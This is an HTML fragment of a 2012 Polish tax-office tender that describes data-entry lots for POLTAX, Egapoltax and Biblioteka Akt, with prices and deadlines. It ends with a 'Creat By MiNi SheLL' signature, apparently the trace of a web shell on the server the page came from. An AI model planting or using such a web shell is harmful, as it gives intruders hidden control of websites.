<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/	120 sztuk/40 sztuk
PIT- 37*/	0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/	120 sztuk/40 sztuk
PIT- 37*/	0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/	120 sztuk/40 sztuk
PIT- 37*/	0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/	120 sztuk/40 sztuk
PIT- 37*/	0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/	120 sztuk/40 sztuk
PIT- 37*/	0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
- rejestrację poczty wychodzącej w programie komputerowym Biblioteka Akt
-archiwizowanie paczek,
-stemplowanie zaksięgowanych i uzgodnionych deklaracji VAT-7 i PIT-37 do zapłaty
-wykonywanie innych czynności niezbędnych w powyższym zakresie zleconych przez Zamawiającego
Minimalna ilość zarejestrowanej poczty w systemie komputerowym Biblioteka Akt wynosi
 25 szt. na 1 godzinę.
Jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybrany jeden wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy 
w wysokości nie większej niż  8,25 zł brutto za jedną godzinę. Zadanie zostało przewidziane na 1170 godzin.

Termin realizacji zadania od 02 kwietnia 2012 r. do 14 grudnia 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji Egapoltax
Wprowadzanie do aplikacji Egapoltax:	Wprowadzanie tytułów wykonawczych oraz wprowadzanie informacji do systemów INFOTAX ,ANALIZATOR, Egapoltax, Biblioteka Akt, Ilość godzin w zadaniu 1.018


Czynności do wykonania w zadaniu:-
- rejestracja wpływających tytułów wykonawczych obcych wierzycieli w rejestrze
- wprowadzanie danych zawartych w tytułach wykonawczych do systemu Egapoltax,
- przekazywanie wprowadzonych tytułów wykonawczych do komórki EA za potwierdzeniem odbioru, 
-sporządzanie notatek służbowych w przypadku braku możliwości wprowadzenia tytułu wykonawczego do systemu 
- przekazywanie notatek służbowych do odpowiednich komórek organizacyjnych, 
- wprowadzanie  informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych o symbolu W2 w aplikacji EGAPOLTAX, 
- wprowadzanie informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  Egapoltax
- wprowadzanie korespondencji wychodzącej do aplikacji Biblioteka Akt oraz wykonanie czynności nadawczych, odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybrany jeden wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż brutto 8,25 zł za jedną godzinę.

Termin realizacji zadania od 15 maja 2012 r. do 14 grudnia 2012r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia w każdej z części/	Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny:
PIT-11, 11A, 8C,PIT-R /0,20/16.000/40 sztuk

Czynności do wykonania w zadaniu:
- utworzenie paczki
- wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX
- przekazywanie paczek  do odpowiednich komórek organizacyjnych,
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych czterech wykonawców.

Termin realizacji zamówienia od 02 kwietnia 2012 r. do 15 lipca 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia w każdej z części/	Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny:
PIT-11, 11A, 8C,PIT-R /0,20/16.000/40 sztuk

Czynności do wykonania w zadaniu:
- utworzenie paczki
- wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX
- przekazywanie paczek  do odpowiednich komórek organizacyjnych,
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych czterech wykonawców.

Termin realizacji zamówienia od 02 kwietnia 2012 r. do 15 lipca 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia w każdej z części/	Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny:
PIT-11, 11A, 8C,PIT-R /0,20/16.000/40 sztuk

Czynności do wykonania w zadaniu:
- utworzenie paczki
- wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX
- przekazywanie paczek  do odpowiednich komórek organizacyjnych,
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych czterech wykonawców.

Termin realizacji zamówienia od 02 kwietnia 2012 r. do 15 lipca 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia w każdej z części/	Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny:
PIT-11, 11A, 8C,PIT-R /0,20/16.000/40 sztuk

Czynności do wykonania w zadaniu:
- utworzenie paczki
- wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX
- przekazywanie paczek  do odpowiednich komórek organizacyjnych,
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych czterech wykonawców.

Termin realizacji zamówienia od 02 kwietnia 2012 r. do 15 lipca 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com